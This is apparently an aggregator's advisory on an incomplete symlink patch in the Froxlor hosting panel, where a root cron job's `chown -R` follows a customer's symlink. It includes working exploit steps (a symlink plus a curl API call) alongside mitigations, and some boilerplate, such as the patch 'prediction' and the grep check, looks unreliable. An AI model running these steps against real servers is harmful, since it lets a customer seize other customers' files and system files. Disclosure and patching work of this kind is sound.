Listen to this Post
The vulnerability stems from an incomplete patch for CVE-2023-6069. After that fix, symlink validation was added to `FileDir::makeCorrectDir()` via a `$fixed_homedir` parameter, which walks each path component and checks for symlinks that escape the customer’s home directory. All customer‑facing API commands (e.g., DirProtections.php, DirOptions.php, Ftps.php, SubDomains.php) pass this parameter—except DataDump.add(). In DataDump.php:88, `makeCorrectDir()` is called without the `$fixed_homedir` argument, so the symlink validation is bypassed.
The unvalidated path flows into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133) that creates a customer data dump. When `ExportCron::handle()` runs as root, it executes `chown -R` on the user‑supplied destination path (lib/Froxlor/Cron/System/ExportCron.php:232). Because `chown -R` follows symlinks in its target argument, an attacker can create a symlink inside their document root pointing to any directory on the system (e.g., `/etc` or another customer’s home). The recursive `chown` then changes the ownership of the target directory and all its contents to the attacker’s UID/GID.
The `Validate::validate()` call on line 86 uses an empty pattern that only strips control characters, and `makeSecurePath()` removes `..` and shell metacharacters but does not check for symlinks. As a result, an authenticated customer with FTP/SSH access can schedule a data export via the API, pointing the `path` parameter to a malicious symlink. When the hourly cron job runs, the system recursively changes ownership of the linked directory, granting the attacker full control over that directory and its files.
This allows horizontal privilege escalation (taking over other customers’ data) and vertical privilege escalation (gaining read/write access to system files such as `/etc/passwd` and /etc/shadow). The attack requires only a single API call and a symlink, with impact delayed until the next cron run, making detection difficult.
dailycve form:
Platform: Froxlor
Version: before 2.1.0
Vulnerability : Incomplete symlink patch
Severity: Critical
date: 2024-03-08
Prediction: Patch expected 2024-03-08
Analytics under heading What Undercode Say:
Check if the vulnerable code path exists grep -n "DataDump.php" lib/Froxlor/Api/Commands/DataDump.php | grep "makeCorrectDir" Expected output (vulnerable): $path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path); Fixed version should show the second parameter: , $customer['documentroot'] Simulate the cron task that runs as root sudo -u root php -r "include 'lib/Froxlor/Cron/System/ExportCron.php'; (new ExportCron())->handle();"
how Exploit:
Step 1: Create a symlink inside the customer's docroot
ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal
Step 2: Schedule data export via API
curl -X POST -H "Content-Type: application/json" \
-d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
https://panel.example.com/api.php
Step 3: Wait for the cron job (typically hourly) to execute the chown -R
After cron runs, the attacker owns /var/customers/webs/victim_customer/
Protection from this CVE
- Apply the patch that adds `$customer[‘documentroot’]` as the second parameter to `makeCorrectDir()` in
DataDump.php:88. - Modify `ExportCron.php:232` to check for symlinks before running `chown -R` (e.g., use `is_link()` and skip the operation if a symlink is detected).
- Alternatively, use `chown -h` (no‑dereference) to change the ownership of the symlink itself rather than its target.
Impact
- Horizontal privilege escalation to other customers’ web files, databases, and emails.
- Vertical privilege escalation to system directories (e.g.,
/etc), allowing read/write access to `/etc/passwd` and `/etc/shadow` for root compromise. - Full data breach of any targeted directory, including configuration files and application secrets.
- Service disruption by changing ownership of critical system directories.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
